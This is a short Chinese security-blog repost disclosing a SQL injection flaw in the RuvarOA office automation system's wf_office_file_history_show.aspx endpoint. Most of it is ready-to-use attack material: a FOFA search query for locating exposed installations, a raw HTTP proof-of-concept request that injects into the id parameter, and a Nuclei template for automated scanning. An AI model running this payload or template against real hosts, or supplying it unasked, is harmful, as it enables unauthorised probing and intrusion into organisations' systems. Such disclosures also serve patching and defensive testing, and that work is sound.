RuvarOA wf_office_file_history_show SQL注入漏洞

admin
admin
admin
107255
文章
89
评论
2024年5月23日00:01:36评论11 views字数 1261阅读4分12秒阅读模式

0x00 阅读须知


免责声明:本文提供的信息和方法仅供网络安全专业人员用于教学和研究目的,不得用于任何非法活动。读者若使用文章内容从事任何未授权的行为,需自行承担所有法律责任和后果。本公众号及作者对由此引起的任何直接或间接损失不负责任。请严格遵守相关法律法规。


0x01 漏洞简介

RuvarOA办公自动化系统是广州市璐华计算机科技有限公司采用组件技术和Web技术相结合,基于Windows平台,构建在大型关系数据库管理系统基础上的,以行政办公为核心,以集成融通业务办公为目标,将网络与无线通讯等信息技术完美结合在一起设计而成的新型办公自动化应用系统。这个系统在/WorkFlow/wf_office_file_history_show.aspx接口被发现存在SQL注入漏洞。

RuvarOA wf_office_file_history_show SQL注入漏洞

0x02 漏洞详情


fofa:app="RuvarOA协同办公平台"


Poc:

GET /WorkFlow/wf_office_file_history_show.aspx?id=1%27%20and%20%28@@version%29%3E0-- HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33Connection: close

RuvarOA wf_office_file_history_show SQL注入漏洞

0x03 Nuclie

id: RuvarOA-wf_office_file_history_show-sqli
info:  name: RuvarOA-wf_office_file_history_show-sqli  author: yunkong  severity: high  description: RuvarOA wf_office_file_history_show SQL注入漏洞  tags: RuvarOA,sqli
http:  - raw:      - |+        GET /WorkFlow/wf_office_file_history_show.aspx?id=1%27%20and%20%28@@version%29%3E0-- HTTP/1.1        Host:         User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33        Connection: close
    matchers-condition: and    matchers:      - type: binary        part: body        binary:          - 6368617220e580bc20262333393b4d6963726f73      - type: status        status:          - 200

RuvarOA wf_office_file_history_show SQL注入漏洞





原文始发于微信公众号(贫僧法号云空):RuvarOA wf_office_file_history_show SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月23日00:01:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   RuvarOA wf_office_file_history_show SQL注入漏洞https://cn-sec.com/archives/2766001.html

发表评论

匿名网友 填写信息